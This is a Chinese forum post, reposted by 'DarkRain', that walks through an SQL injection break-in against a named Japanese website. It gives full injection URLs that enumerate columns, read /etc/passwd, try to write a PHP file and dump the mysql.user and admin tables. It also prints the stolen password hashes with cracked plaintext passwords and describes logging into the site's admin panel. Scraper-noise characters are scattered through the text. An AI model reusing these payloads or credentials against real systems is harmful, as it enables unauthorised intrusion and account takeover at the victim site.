|
|
% b9 S/ @" l) E5 D) d; i$ V) D y
4 |0 B) S/ X0 X0x01. 检测 www.zuaa.jp 收集数据$ T! A6 K" T( D0 N: t; d$ f
, r3 \) X7 D5 R! x; p2 e. h
0 j6 K. Y# I, |! l" Owhatweb1 u: s: x. a( e
) k F8 i1 w! M) }
% l2 Y& d, W1 C& C8 d; K5 H利用NMAP扫描
' W/ A: y/ B {5 k3 ^
+ |6 d) j r! Q) _4 V; K$ f3 M7 ^& e: D中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持5 N* W) x, D3 M9 k. c0 E* @
0x02.找注入点 c/ N1 i4 S0 n; i: w0 d% [
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
9 g# }5 t/ z; w* w/ n3 T
7 B5 J7 h% w7 |3 o1 g! c/ f e+ X# O1 p
0x03.order by
( b- x. Q7 o+ s. W6 u http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
; t" o; `4 y; V- o
1 }- t% p6 U: worder by 28报错,order by 27正常
$ o, ~! B. @ w" @. y* n) d2 @ S0 Z. p3 B
0x04. union手动查询! @! p8 ^8 I6 j6 ^) p/ h
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 * H$ c. `* d% L1 N( ~" U$ h/ l
添加到 27 时正常显示
: q9 l7 d" x1 z8 e) |5 r# Y/ |: t, k
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持" x3 d/ m+ a+ K8 S1 O2 @
z. ~" Y$ C1 x( S
0x05. info:
! ?) M6 @5 P8 N u1 ]4 W2 m2 [& g( {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% J+ U. \ c, d& L7 _
* j& a, n1 v) s. Tuser: root@localhost
! \% ?& s( X% X* N) X+ n/ ~database: openpne
: C) p! S/ P5 R1 x! P8 ?8 k* rversion: 4.1.22
4 T6 Y% p* ~$ F+ [( L/ s. {os: portbld-freebsd5.4
4 ^3 P5 v: e. ]+ x& v
3 r/ B$ H8 m- u0x06. root用户* e2 _! g( p j7 O& K6 ]
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
/ ^+ `. l, Z. d4 Z% m& V5 g' Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 @& E% f: @. c
# W4 K8 w9 R! J3 z通过工具转换
- o, w8 ], N% m) G2 C$ C" m0 J# r/ l; f/ [5 D4 {
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
( T# K6 E' u" \7 Q7 W, w
1 x" X2 G$ P' ] V2 L. J0x07. 利用 into outfile
# r( _ e$ J: t" i+ j全部都失败
7 k- i! T+ _ C. G; k( z8 }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
- w# @4 J4 u M8 n
7 w& j |, E2 Z+ q: Q8 s- ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php . c" t' X% k( y- k" J8 @5 I8 a( |; l
, n( z6 N3 V! h9 b% H3 t
页面显示“MDB2 Error:syntax error”3 K9 T7 {) v ^" J: n
4 P" i. Q( f3 t0 K& D0 \- u& T/ e0x08. 利用 mysql 4.1
4 O( m" I7 t8 n7 d& C猜常规表名,字段未果 工具 sqlmap7 G0 i0 M* L$ {1 T& {1 I) g* `/ ?8 |
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持& e+ U$ O+ H3 y+ t x
: ^9 G$ f, q7 H/ _% o' B
: b& ^3 |( N9 Q- S8 i% k e$ T* o4 b
2 f- i2 W5 V; [; Q0x09. 查找后台- H3 C- q" |4 V2 v+ J
利用 现有的各种 后台工具尝试都不行) x& s6 d) x# \, z' ]: D9 m9 k7 u D
0 T9 S( ~+ T% q% h" E' q
0x10. MySL外联方法
6 Q* Z# B/ k5 d0 c8 n" W从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行$ a! W3 G; ?7 x$ W" X
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
* o& E, V0 @5 Q% ^5 H; S* Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
# W! J' B M. M
% `& n. K3 j# k& @这个可以在 www.cmd5.com 解密
2 M, D& X, Q K( b2 K; Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009( f) V6 w/ N4 {7 S4 ]( B0 r
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97& m* N4 S. X* n5 e2 E5 s) x9 j
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
/ T! K+ I5 N5 P& }. I% A+ }zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???# z& M& f3 {' [: f9 T. v4 z+ E; Z8 P
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知5 @, @9 s! j3 N z: O4 |# W: l
0 l5 T3 E; l" ?0 u) n+ p
5 h, g: R3 m @, l4 u0x11. 网站突破2 G- G9 [, S6 Q1 t; G! z- A, e0 i
发现网站的源程序 openpne, google 下载 openpne 源码
2 E y7 B' Y( o( l' n1 a" f/ C b
2 ^; c; i' |. L6 X, g. b. `
0x12. 默认信息利用( M8 g1 V6 B3 |
http://sns.zuaa.jp/?m=admin&a=page_login. K" d; v. {) _4 t5 X; z
a; F. ?+ v; j4 |, z表名 (c_admin_user) ,字段名(username,password)% z/ W2 Y) p/ d3 q- I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
A4 ?. ?+ g6 } j5 F- p: q0 L
: g) P5 G, b* K/ y9 |解密
% @$ y' ?. }4 w. N& z4 N0 h) r) N5 zzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa20090 t6 x; x" |8 ^ ] ]
zuaajp:c0923ec5857796a393da99905008c176, zju1897
7 R2 b3 f8 @3 c5 p X* H4 |% e- V' E; ? J9 O
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
/ C* q8 a4 ]# J' M$ |, ^. A3 b, ~, W$ Q3 b; E. p: {
0x13. 登录后台
! a k0 |: O# E$ e( ^. _+ {
' ?$ Q+ K8 J) f
. x( W2 t# u3 R* f
" g) u; u& {; a# d( r0x14. 小结! y$ V2 y6 D& S- [) k \7 w' g
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
; B2 J. g6 P. ~; ]+ M感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点+ j4 r% N: X3 K! R# ?
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
& B) G) k9 v, M中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
2 S" ?' ]1 ^4 i' [" ?+ j
7 I f/ b: O& E& W9 b' W最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!4 A5 q2 B3 |: E6 u' d, I& W
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|